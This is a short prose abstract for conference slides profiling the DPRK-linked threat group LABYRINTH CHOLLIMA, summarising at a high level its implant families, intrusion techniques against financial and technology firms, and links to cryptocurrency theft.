OBTS_v6_gLongo_bWiley.pdf (3 MB)

LABYRINTH CHOLLIMA is presented as a prolific DPRK threat group tied to intelligence collection, currency generation, and high profile state sponsored operations. The slides describe a custom implant set across Windows, Linux, macOS, and Android, including the MataNet, Dacls, MATA, and TIEDYE modular framework with plugins for tunnels, proxies, compression, and upload. The intrusion examples focus on financial and technology organizations in late 2022 and early 2023, using social engineering, backdoored coding challenges or PDF readers, curl fetched macOS payloads, LaunchAgent and LaunchDaemon persistence, reconnaissance of AWS, shell history and SSH keys, and exfiltration staging. The material links the targeting to cryptocurrency theft and the expansion of DPRK operations into blockchain related sectors.